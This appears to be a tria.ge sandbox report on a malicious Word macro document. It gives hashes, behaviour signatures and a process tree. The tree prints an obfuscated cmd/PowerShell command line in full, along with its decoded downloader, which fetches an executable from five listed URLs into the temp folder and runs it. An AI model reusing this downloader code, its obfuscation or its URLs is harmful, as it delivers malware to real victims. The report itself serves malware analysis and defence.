Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

8

7514c01da5...18.doc

windows7-x64

10

7514c01da5...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    26/05/2024, 09:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7514c01da515faf4c327dae34fa3fa05_JaffaCakes118.doc

  • Size

    136KB

  • MD5

    7514c01da515faf4c327dae34fa3fa05

  • SHA1

    3fe84faf29d4accca4bfb7850a0c49c7cecab027

  • SHA256

    f5abc12da196850236b5a32fe7c2b36143b95aebe1faeea4494f4a3722d29ff7

  • SHA512

    6f015a15a2433a9ce5fc2729db7dbb49e23ec7739eab7b7722ca8dbd71a0cdc8f4e43490c6a7e1c236482c303a108316b9853eb2ed9e4c7e41b9e46492a24a71

  • SSDEEP

    1536:U7g81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9Se+Tw92IcvHjLGuj:/8GhDS0o9zTGOZD6EbzCdETwmHjLGuj

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7514c01da515faf4c327dae34fa3fa05_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2004
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1888
      • \??\c:\windows\SysWOW64\cmd.exe
        c:\AZQNjdNNWZPw\oTLOWUMF\vcmbidKchk\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set k8=5N{;@lN'donzOxwM^>f}foL:'u1?=H@,rRr$Pl%/nNi9$gD+}ID6}*X@{b_'h)7zcV)~ta42a5CRcCGJ}1'`}n_0;s+^&k5vda3o4egx#rLE'buF};D^<0'TS.CWmhcI)`Z?0}'+/4=h^<Sd{sPJnjujZ[-$gZ[;2~XOIqwXMGok5GJ$O3b uFLmaCperK^<t~`,I#(*-cQPeV+wkCj@o*7Pvku6nYspItDI{~Yx TXO):6V023#0%+f0KEz0w{)8Jt/ (7]e8?Cg({;-2jI 6mRhg_*t9~ gKR nepRe[CUlk^>B.@5D)d#uOzZVXu^&)k2-8$Obz I:]mPM^&e~aAtgj(INOi-oBCtX)xeaJ4G$}x(4Li(*G; c~7fv'QIKhk;8D^|'^&zGFLXwLe}qz,g-'`+}==}5N8Epo;dpP[Nj$B2Q;%4b)b-1OM{YX1H,kn2L$N?p I^>4,][vcM%:z.3-MD p$siO(n?LeUk/lW]^|iRm@Fuovd=YNa o8o$[-lK{gnv@Vw#QeoXuvDbF^|.-e'YJ9OK^&E[fs'P$ZG5{bU(yda^&r\BhtrG%{@,.)6Dsm-?yOV:PfFu1$^<(a \p3nB^<qiEvl tQXcyHdz@FzML6_$KTx(v*9hAE9c)QSaRNpe6/Or%zRoPr=fzg);mXg'Dvfeu'(xZgWePGn.$LR'2Rk+H2`W[0JF:AHlS(N$yo/+y^<u'\`U\4=('i,4+q]hpPqgmS~OehLJtN3{:)NGv.ePnlI.e^<+q$Wvx=l^|3OyV.X^>tqk@\X$%7D;,:_'A5#lGxcwM9.j1sQ')TD=l'gFMA;EQPhz[-g$kKI;`%m'.\z0J_=00j+7 l)'+g3 J^|C=5@* VjrW_ZJFpktlbMg$h:];Ns]'M0$G?dkmKsEm84X'u(I=3-.F3x)U^>P myxa$AP[;)[:)A+o'GYw@^&xL'A8P(KDit$kBiUJXl#RYpz5nSzH[.*l^|'@{y9^>4ct^>^<-wS:^>/2][l9[WpTA..+sDm?~Toq#*c9)5.FQpiP$WkXohmEQ\oQ1^<d8AhetW]ngUOa`FCp2UyowW5koZ+a^>%UzJ,Z/ZA^|/3',:h/Qpx*(toW9tZWihxl^&@@)-MV2670@f/b+udfjmeUqgk)YocXF@aS9(hp0b-k%K_Da7/{$okK }u-A#.^|SQo/cNcBxW.z$?b]ukemlUwuoJe:nhhD@ut#}M4YXK/O;p/QN[:$pTp~7qtI`et^<M(h^<3m@F7-a$y)rR1[xN8[XItjUN~=/D.Rn,' i2g;.o$%ex5`r-m.o#PMmb'EvvU1aP} hB=9/#p]/2y7:KI/ptZut){rtS({hg\^|@jU)Xpf0zS4xQLN^&jyDwN9)qz+nBs;V^&2l\m/Oo;kl0hu=Yi.8*=oE(AcZV9.SBly;u$o}^&Ic,fbcuSCm8yPrSeliR,JaF7RtJ-6s Y`ieuKlC( a$LO/ qY/8T\:^|gVpK^<mt g/tj^>Mhqe(@)F-dbStKRV)lG^<9PO*m/]XLmKS;o2\McCmR.9e$gKe`n7:nilFNt)+Tl6V5uFN0sqw4n^<J`oBb?c_-Zz\N,tOsmau1QajrWb[na//d)/B-x:Ww_pn8qtm.utk;'ha-G'v9W=;DdmMD;OeT%f;t,$Dgu;4+ytI2znTx~eh*wid%Tl8NPCI),bBOze'FkWZf#.xe-t]^>teR./NDHU X/mt,oKcPbke'NFj'8nbPa6oKq6-xP7wH_We5QKnH+Q=oXbYH5^&K@:%fong$)pu;0]I'dr{m80Hc61FI?p9'WE3=~sJw5 fCds;nr%*$&&for /L %H in (1771,-4,3)do set QVMh=!QVMh!!k8:~%H,1!&&if %H==3 echo !QVMh:*QVMh!=! |powershell.exe -"
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2784
        • C:\Windows\SysWOW64\cmd.exe
          CmD /V:ON/C"set k8=5N{;@lN'donzOxwM^>f}foL:'u1?=H@,rRr$Pl%/nNi9$gD+}ID6}*X@{b_'h)7zcV)~ta42a5CRcCGJ}1'`}n_0;s+^&k5vda3o4egx#rLE'buF};D^<0'TS.CWmhcI)`Z?0}'+/4=h^<Sd{sPJnjujZ[-$gZ[;2~XOIqwXMGok5GJ$O3b uFLmaCperK^<t~`,I#(*-cQPeV+wkCj@o*7Pvku6nYspItDI{~Yx TXO):6V023#0%+f0KEz0w{)8Jt/ (7]e8?Cg({;-2jI 6mRhg_*t9~ gKR nepRe[CUlk^>B.@5D)d#uOzZVXu^&)k2-8$Obz I:]mPM^&e~aAtgj(INOi-oBCtX)xeaJ4G$}x(4Li(*G; c~7fv'QIKhk;8D^|'^&zGFLXwLe}qz,g-'`+}==}5N8Epo;dpP[Nj$B2Q;%4b)b-1OM{YX1H,kn2L$N?p I^>4,][vcM%:z.3-MD p$siO(n?LeUk/lW]^|iRm@Fuovd=YNa o8o$[-lK{gnv@Vw#QeoXuvDbF^|.-e'YJ9OK^&E[fs'P$ZG5{bU(yda^&r\BhtrG%{@,.)6Dsm-?yOV:PfFu1$^<(a \p3nB^<qiEvl tQXcyHdz@FzML6_$KTx(v*9hAE9c)QSaRNpe6/Or%zRoPr=fzg);mXg'Dvfeu'(xZgWePGn.$LR'2Rk+H2`W[0JF:AHlS(N$yo/+y^<u'\`U\4=('i,4+q]hpPqgmS~OehLJtN3{:)NGv.ePnlI.e^<+q$Wvx=l^|3OyV.X^>tqk@\X$%7D;,:_'A5#lGxcwM9.j1sQ')TD=l'gFMA;EQPhz[-g$kKI;`%m'.\z0J_=00j+7 l)'+g3 J^|C=5@* VjrW_ZJFpktlbMg$h:];Ns]'M0$G?dkmKsEm84X'u(I=3-.F3x)U^>P myxa$AP[;)[:)A+o'GYw@^&xL'A8P(KDit$kBiUJXl#RYpz5nSzH[.*l^|'@{y9^>4ct^>^<-wS:^>/2][l9[WpTA..+sDm?~Toq#*c9)5.FQpiP$WkXohmEQ\oQ1^<d8AhetW]ngUOa`FCp2UyowW5koZ+a^>%UzJ,Z/ZA^|/3',:h/Qpx*(toW9tZWihxl^&@@)-MV2670@f/b+udfjmeUqgk)YocXF@aS9(hp0b-k%K_Da7/{$okK }u-A#.^|SQo/cNcBxW.z$?b]ukemlUwuoJe:nhhD@ut#}M4YXK/O;p/QN[:$pTp~7qtI`et^<M(h^<3m@F7-a$y)rR1[xN8[XItjUN~=/D.Rn,' i2g;.o$%ex5`r-m.o#PMmb'EvvU1aP} hB=9/#p]/2y7:KI/ptZut){rtS({hg\^|@jU)Xpf0zS4xQLN^&jyDwN9)qz+nBs;V^&2l\m/Oo;kl0hu=Yi.8*=oE(AcZV9.SBly;u$o}^&Ic,fbcuSCm8yPrSeliR,JaF7RtJ-6s Y`ieuKlC( a$LO/ qY/8T\:^|gVpK^<mt g/tj^>Mhqe(@)F-dbStKRV)lG^<9PO*m/]XLmKS;o2\McCmR.9e$gKe`n7:nilFNt)+Tl6V5uFN0sqw4n^<J`oBb?c_-Zz\N,tOsmau1QajrWb[na//d)/B-x:Ww_pn8qtm.utk;'ha-G'v9W=;DdmMD;OeT%f;t,$Dgu;4+ytI2znTx~eh*wid%Tl8NPCI),bBOze'FkWZf#.xe-t]^>teR./NDHU X/mt,oKcPbke'NFj'8nbPa6oKq6-xP7wH_We5QKnH+Q=oXbYH5^&K@:%fong$)pu;0]I'dr{m80Hc61FI?p9'WE3=~sJw5 fCds;nr%*$&&for /L %H in (1771,-4,3)do set QVMh=!QVMh!!k8:~%H,1!&&if %H==3 echo !QVMh:*QVMh!=! |powershell.exe -"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2720
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo $nCw='Icm';$fKY=new-object Net.WebClient;$fOm='http://baatzconsulting.com/PlKd@http://alistairmccoy.co.uk/2szNjQzX@http://havmore.in/UXxra@http://4theweb.co.uk/_-hacked/7M@http://zakopanedomki.com.pl/wt9'.Split('@');$mUF='mmG';$lFW = '700';$zEF='jwl';$kXO=$env:temp+'\'+$lFW+'.exe';foreach($Mzc in $fOm){try{$fKY.DownloadFile($Mzc, $kXO);$PoN='zLF';If ((Get-Item $kXO).length -ge 80000) {Invoke-Item $kXO;$jJd='ZcC';break;}}catch{}}$nPr='fMz'; "
            4⤵
              PID:2780
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -
              4⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2580

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
        Filesize

        20KB

        MD5

        bef9863eab42178bb36f12a2f2cae710

        SHA1

        84d17a246c376d4d887889010390feb6706a91f4

        SHA256

        fadc74b9e86ed6fc40964a1390b9a97aa7959daad85d3ae7e4252d76ca7bc1ce

        SHA512

        f8e810cb990e7350d3d284c261760679ea85282b5b878c46efdf0ff55720c42b5f6133bda8e2a86b81852b6965bada40f8f9edc70748f6a1811aa0f0686d0622

        Download Submit

      • memory/2004-0-0x000000002FAC1000-0x000000002FAC2000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2004-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2004-2-0x0000000070CFD000-0x0000000070D08000-memory.dmp

        Filesize

        44KB

        Download

      • memory/2004-6-0x00000000001E0000-0x00000000002E0000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/2004-7-0x00000000001E0000-0x00000000002E0000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/2004-8-0x00000000001E0000-0x00000000002E0000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/2004-16-0x0000000070CFD000-0x0000000070D08000-memory.dmp

        Filesize

        44KB

        Download

      • memory/2004-17-0x00000000001E0000-0x00000000002E0000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/2004-33-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2004-34-0x0000000070CFD000-0x0000000070D08000-memory.dmp

        Filesize

        44KB

        Download